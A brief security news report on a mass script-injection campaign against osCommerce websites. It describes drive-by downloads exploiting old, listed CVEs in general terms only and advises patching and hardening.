14 DAY TRIAL // Security researchers from web application security provider Armorize have come across a new mass injection attack targeting osCommerce websites that has already infected more than 90,000 pages.
Attackers began by injecting a hidden iframe pointing to a malicious URL, but later switched to a rogue script element that loads a rogue JavaScript file from an external domain.
The injected code doesn't seem to be obfuscated, so searching for it on Google revealed over 90,000 hits, indicating this attack is widespread.
Both versions of the injection take visitors through several redirects until landing them on a page that loads exploits for vulnerabilities in browser plug-ins and popular applications.
This type of attack, known as a drive-by download, is very dangerous because it requires no user interaction and there is usually little to no indication that something malicious has happened.
According to the Armorize researchers, this attack exploits vulnerabilities in Java (CVE-2010-0840 and CVE-2010-0886), Adobe Reader (CVE-2010-0188), Internet Explorer (CVE-2006-0003) and Windows XP (CVE-2010-1885).
Given that all of these vulnerabilities are quite old, users who keep their software and operating system up to date should be protected against the attack.
osCommerce is one of the most popular e-commerce platforms but it has extremely long wait periods between releases. The current version of the software is 3.0 and was released at the end of March, but the previous release dated from 2008.
In order to prevent injection attacks osCommerce users are advised to follow several instructions to strengthen the security of their installations and install several specialized extensions.
However, many webmasters have never bothered going through these steps leaving a large number of websites vulnerable to hackers. A post on the osCommerce support forum aggregates many of the security tips available for the platform.